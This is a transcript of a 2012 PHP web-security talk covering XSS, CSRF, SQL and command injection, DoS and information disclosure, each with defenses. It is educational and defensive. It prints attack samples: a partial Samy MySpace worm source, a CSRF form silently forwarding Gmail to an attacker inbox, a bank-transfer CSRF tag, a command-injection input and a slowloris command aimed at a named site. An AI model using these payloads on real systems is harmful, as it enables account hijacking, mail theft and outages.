Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Stop Exposing Yourself: Exploits, Attacks and Defenses

F670cde47cb2f445575ac4e0e3c7a889?s=47 Geoffrey Tran
July 03, 2012
Programming
2
370

Stop Exposing Yourself: Exploits, Attacks and Defenses

A talk about security issues and exploits in the web with a focus on PHP. We will cover common exploits and how to defense yourself from them.

F670cde47cb2f445575ac4e0e3c7a889?s=128

Geoffrey Tran

July 03, 2012
Tweet

More Decks by Geoffrey Tran

See All by Geoffrey Tran
F670cde47cb2f445575ac4e0e3c7a889?s=48 geoff
1
200

Other Decks in Programming

See All in Programming
E10ba38646a905c8cd2c893c84d5c520?s=48 suzushin54
0
270
96466365a9bf7e66990f2b9ba547b02f?s=48 yumu19
1
730
C6b97a47d5406cfdef50a5c755751c16?s=48 sorami
2
540
33b8caffacdb02e62cd9141a8aeb35aa?s=48 tanakahiroki1
0
430
Ca7e4f1680e175e6462a039923e71fc5?s=48 kyokonishito
0
170
3799f16d41d627cf75b984212844c7ed?s=48 ryamakuchi
1
240
0c217b9a7dd0aa31ed40bd0f453727e1?s=48 ramsey
PRO
1
240
A56269ca269966f71293d08b32ad53b3?s=48 utaani
0
130
404a34d5e0d3d7b38237a8cbecf4c18a?s=48 seiseikai123
0
230
7e56a691cfb413e0f6e631791f33fe54?s=48 mismith0227
0
200
B61a8b5e5ce71ea4796afaea614bbb19?s=48 nein37
1
1.6k
6afbe110d33ef7e859fb8649b86bae55?s=48 mashabow
0
530

Featured

See All Featured
1519587b1a0febb658c36c94f6272b0d?s=48 roundedbygravity
85
8.3k
282d599b414022eba5096510f675b6e2?s=48 chrislema
174
14k
48c098b6579220a67a6ba949be6e4b5a?s=48 revolveconf
204
10k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
149
20k
Aebc2d07a50011e2a30d38435fde564a?s=48 jrom
120
7.5k
5f2da528927a2ec9ba4fec2069cbc958?s=48 kneath
298
40k
A0517b08532aec8ab2aae3f65d40ad86?s=48 hannesfritz
32
1.2k
7559f6cff1f5efc2d210965febd4d71c?s=48 bermonpainter
349
27k
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
289
47k
0438ae60cde4c7add6f9da48f28c15cc?s=48 chrisshort
7
30k
433acaea1012b25d97ae66da9b998dad?s=48 malarkey
122
16k
Ae14cc4491ac334f9cd23f9f93b4305e?s=48 orderedlist
PRO
333
37k

Transcript

  1. Stop Exposing Yourself Exploits, Attacks and Defenses Geoffrey Tran Creative

    Technology, RAPP

  2. About Me •  Creative Technologist at RAPP •  Fun with

    PHP since 2005 •  Contributor to Zend Framework and Symfony2 Download Examples: http://rapp.io/1y 2

  3. Why even bother? “Information leakage is one of the biggest

    issues that organizations are facing” Download Examples: http://rapp.io/1y 3

  4. Why even bother? “93% of organizations have been hacked at

    least once in the past two years through insecure Web applications” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 4

  5. Why even bother? “74% of respondents believe Web applications security

    is either more critical or equally critical to other security issues faced by their organizations” Download Examples: http://rapp.io/1y State of Web Application Security, Ponemon Institute 5

  6. Why even bother? “12% strongly agree that they have ample

    resources to detect and remediate insecure Web apps” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 6

  7. Why even bother? “64% do not agree that their organization

    is able to fix Web application vulnerabilities quickly” State of Web Application Security, Ponemon Institute Download Examples: http://rapp.io/1y 7

  8. Why even bother? “88% of respondents say their Web application

    security budget is less than the organization’s coffee budget” State of Web Application Security, Ponemon Institute Download Examples: http://bit.ly/NcGSod 8

  9. OWASP Top 10 Application Security Risks - 2010 1.  Injection

    Attacks 2.  Cross Site Scripting (XSS) 3.  Authentication and Session Management 4.  Unauthorized access/Privilege escalation 5.  Cross Site Request Forgery (CSRF) 6.  Misconfiguration 7.  Insecure Storage 8.  Failure to restrict URL access 9.  Insufficient transport layer protection 10. Un-validated redirects and forwards https://www.owasp.org/index.php/Top_10_2010-Main 9

  10. Overview •  Cross-site scripting (XSS) •  Cross-site request forgery (CSRF)

    •  SQL Injection •  Command Injection •  Remote Code Execution •  Denial of Service •  Unnecessary Information Disclosure 10

  11. Cross-site scripting (XSS) •  Occurs when – Data enters an application

    through an untrusted source, most frequently a web request – The data is included in dynamic content that is sent to a web user without being validated for malicious code https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 11

  12. Cross-site scripting (XSS) •  Types of XSS Attacks – Stored XSS

    Attacks (Persistent) •  When injected code is stored and unknowingly retrieved by victims – Reflected XSS Attacks (Non-Persistent) •  When injected code is reflected off the application via an un-escaped field https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 12

  13. Cross-site scripting (XSS) •  What can an attacker do with

    an XSS vulnerability? – Launch a phishing attack – Steal session and cookie data to log in as the victim – Perform unwanted actions as the victim https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 13

  14. CROSS-SITE SCRIPTING (XSS) Reflected XSS Example Example: lonestar12/XSS/reflected.php 14

  15. Cross-site scripting (XSS) •  Imagine you have a search results

    page •  You display the query a user inputs in the search field – “You searched for: dogs” Example: lonestar12/XSS/reflected.php <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 15

  16. Cross-site scripting (XSS) •  But what happens if a user

    enters the following as a query? Example: lonestar12/XSS/reflected.php <script>alert('Hi')</script> <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 16

  17. Cross-site scripting (XSS) Example: lonestar12/XSS/reflected.php <script>alert('Hi')</script> 17

  18. Cross-site scripting (XSS) We end up with the following output:

    Example: lonestar12/XSS/reflected.php <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>Showing results for: "<script>alert('hi')</script>"</h2> <form method="get"> <input type="text" name="q" /> <input type="submit" value="Search" /> </form> <h2>You searched for: "<?php echo $_GET['q'] ?>"</h2> 18

  19. Cross-site scripting (XSS) Example: lonestar12/XSS/reflected.php 19

  20. CROSS-SITE SCRIPTING (XSS) MySpace “Samy is my hero” Example http://namb.la/popular/

    http://www.slideshare.net/simon/when-ajax-attacks-web-application-security-fundamentals-presentation 20

  21. Cross-site scripting (XSS) <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var

    A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU) {M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(! M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)} function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O+ +}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false} eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true} function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R +1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')} catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState! =4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</ 21

  22. Cross-site scripting (XSS) October 4th, 2005 12:34 pm: You have

    73 friends. I decided to release my little popularity program. I'm going to be famous...among my friends. 1:30 am: You have 73 friends and 1 friend request. One of my friends' girlfriend looks at my profile. She's obviously checking me out. I approve her inadvertent friend request and go to bed grinning. 8:35 am: You have 74 friends and 221 friend requests. Woah. I did not expect this much. I'm surprised it even worked.. 200 people have been infected in 8 hours. That means I'll have 600 new friends added every day. Woah. 9:30 am: You have 74 friends and 480 friend requests. Oh wait, it's exponential, isn't it. Shit. 22

  23. Cross-site scripting (XSS) In 20 hours, “Samy is my hero”

    spread to 1,005,831 people ...1/35th of all MySpace users 23

  24. Cross-site scripting (XSS) 24

  25. Preventing Cross-site scripting (XSS) •  $_GET •  $_POST •  $_COOKIE

    •  $_REQUEST •  $_FILES •  $_ENV •  $_SERVER 25 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) These all can be manipulated by the user Don’t trust anyone …Not even little girls

  26. Preventing Cross-site scripting (XSS) •  Always user validate input – filter_var

    •  Escape or filter all outputs – htmlspecialchars() – htmlentities() – strip_tags() •  Beware with tag allowances as attributes are not validated 26

  27. Cross-site Request Forgery (CSRF) •  Occurs when victims load a

    page that contains a malicious request •  Malicious because the request inherits the identity and privileges of the victim forcing an undesired action on the victim’s behalf. – Posting a tweet – Purchasing a product http://en.wikipedia.org/wiki/Cross-site_request_forgery 27

  28. CROSS-SITE REQUEST FORGERY (CSRF) CSRF Example Example: lonestar12/CSRF/img.html 28

  29. Cross-site Request Forgery (CSRF) •  An attacker creates a seemingly

    harmless looking webpage •  A visitor lands on the page while logged in to their bank's website, which has a CSRF vulnerability •  The malicious page creates a request on behalf of the visitor to transfer funds without permission <img src="http://bank.com/transferFunds?amount=5000&to=Geoff's Bank Account" width="0" height="0" /> Example: lonestar12/CSRF/img.html 29

  30. CROSS-SITE REQUEST FORGERY (CSRF) Google Gmail Email Snooping (2007) http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

    30

  31. Cross-site Request Forgery (CSRF) 31

  32. Cross-site Request Forgery (CSRF) 32

  33. Cross-site Request Forgery (CSRF) <form method="POST" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf" enctype="multipart/form-data"> <input type="hidden"

    name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/> <input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script> document.forms[0].submit(); </script> 33

  34. Cross-site Request Forgery (CSRF) 34

  35. Preventing CSRF •  Require POST for actions that modify data

    •  Require a token or “crumb” for all sensitive forms 35

  36. Preventing CSRF 36 <?php if (!isset($_SESSION['csrfToken'])) { $_SESSION['csrfToken'] = md5(uniqid("",

    true)); } if ($_SERVER['REQUEST_METHOD'] == 'POST') { if ($_POST['csrf_token'] == $_SESSION['csrfToken']) { // SUCCESS } else { // FAILURE header('HTTP/1.0 403 Forbidden'); exit; } } ?> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrfToken'] ?>" /> <input type="text" name="amount" value=""/> <input type="text" name="to" value=""/> <input type="submit" value="Transfer Funds" /> </form>

  37. Preventing CSRF (crossdomain.xml) •  Do not use the following as

    your crossdomain.xml •  Putting this at example.com/crossdomain.xml allows Flash applets on other sites make requests to your site on behalf of the user 37 <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy>

  38. SQL Injection •  Occurs when attackers inject un- escaped SQL

    commands into a predefined SQL query http://xkcd.com/327/ 38

  39. SQL INJECTION SQL Injection Example Example: lonestar12/SQL Injection/img.html 39

  40. SQL Injection •  Beware of un-escaped user input •  Use

    prepared statements or proper quoting instead 40 $pdo->exec('INSERT INTO `comments` (`body`) VALUES ("' . $_POST['body'] . '")'); $stmt = $pdo->prepare('INSERT INTO `comments` (`body`) VALUES (:body)'); $stmt->bindParam(':body', $_POST['body']); $stmt->execute();

  41. SQL INJECTION MySQL.com Website Falls Victim to SQL Injection Attack

    http://www.pcworld.com/businesscenter/article/223457/mysql_website_falls_victim_to_sql_injection_attack.html 41 http://pastebin.com/BayvYdcP

  42. Command Injection •  Occurs when an attacker is able to

    inject system commands •  Command injection attacks are possible in most cases because of lack of correct input data validation 42

  43. COMMAND INJECTION Command Injection Example Example: lonestar12/Command Injection/example.php 43

  44. Command Injection 44 •  A simple nslookup page <?php $host

    = 'google'; if (isset($_GET['host'])) { $host = $_GET['host']; } system("nslookup " . $host); ?> <form method="get"> <select name="host"> <option value="google.com">google</option> <option value="yahoo.com">yahoo</option> </select> <input type="submit"> </form>

  45. Command Injection 45 •  What if $_GET[‘host’] contained – google.com &&

    ls / Example: lonestar12/Command Injection/example.php <?php $host = 'google'; if (isset($_GET['host'])) { $host = $_GET['host']; } system("nslookup " . $host); ?> <form method="get"> <select name="host"> <option value="google.com">google</option> <option value="yahoo.com">yahoo</option> </select> <input type="submit">

  46. Command Injection 46 Example: lonestar12/Command Injection/example.php example.php?host=google.com %26%26 ls -a

    /

  47. Preventing Command Injection 47 •  Escape shell commands – escapeshellarg() – escapeshellcmd()

    <?php // We allow arbitrary number of arguments intentionally here. $command = './configure '.$_POST['configure_options']; $command = escapeshellcmd($command); system($command); <?php system('ls '.escapeshellarg($dir));

  48. Denial of Service (DoS) •  A DoS attack focuses on

    making a service unavailable or degraded to users 52

  49. Methods of DoS Attacks •  ICMP flood •  SYN flood

    •  Teardrop attacks •  Low-rate attacks •  Peer-to-peer attacks •  Asymmetry of resource utilization in starvation •  Permanent DoS attacks •  Application-level floods •  Nuke •  R-U-Dead-Yet? •  Distributed attacks •  Reflected / Spoofed attacks •  Degradation-of- service attacks •  Unintentional DoS 53

  50. DENIAL OF SERVICE (DOS) Slowloris Denial of Service Example Example:

    lonestar12/Denial of Service/slowloris.php 54

  51. Slowloris Denial of Service (DoS) •  Slowloris Attack –  Tries

    to keep many connections to the target web server open and hold them open as long as possible. –  It accomplishes this by opening connections to the target web server and sending a partial request. –  Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. –  Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients 55 Example: lonestar12/Denial of Service/slowloris.php

  52. Denial of Service (DoS) •  Slowloris affects the following webservers

    –  Apache 1.x, Apache 2.x, dhttpd, and the GoAhead WebServer 56 Example: lonestar12/Denial of Service/slowloris.php # php slowloris.php get 100000 jakefolio.com

  53. Preventing Denial of Service (DoS) Attacks •  Apache – mod_security, mod_evasive,

    mod_qos, mod_antiloris •  Look into proper firewalls and intrusion detection systems 57 Example: lonestar12/Denial of Service/slowloris.php

  54. Unnecessary Information Disclosure – Reduce your attack surface •  PHP displaying

    errors/exceptions •  Exposing php information •  Exposing Apache information •  Exposing Server information 59

  55. Unnecessary Information Disclosure Reduce your attackable surfaces 60 Hide displaying

    of errors and exceptions ; php.ini display_errors = Off OR ini_set(‘display_errors’, false);

  56. Unnecessary Information Disclosure Reduce your attackable surfaces 61 Hide exposure

    of PHP ; php.ini expose_php = Off HTTP/1.1 200 OK Date: Fri, 29 Jun 2012 17:02:54 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.6 Vary: Accept-Encoding Content-Type: text/html

  57. Unnecessary Information Disclosure Reduce your attackable surfaces 62 Hide exposure

    of Apache # Debian # /etc/apache2/apache2.conf ServerTokens prod HTTP/1.1 200 OK Date: Fri, 29 Jun 2012 17:02:54 GMT Server: Apache/2.2.16 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html

  58. Unnecessary Information Disclosure Reduce your attackable surfaces 63 Don’t expose

    your database, search server, memcache, mail server, etc... Configure your firewall

  59. Stop Exposing Yourself Exploits, Attacks and Defenses 64 @geoffreytran http://www.linkedin.com/in/geoffreytran

    geoffrey.tran@gmail.com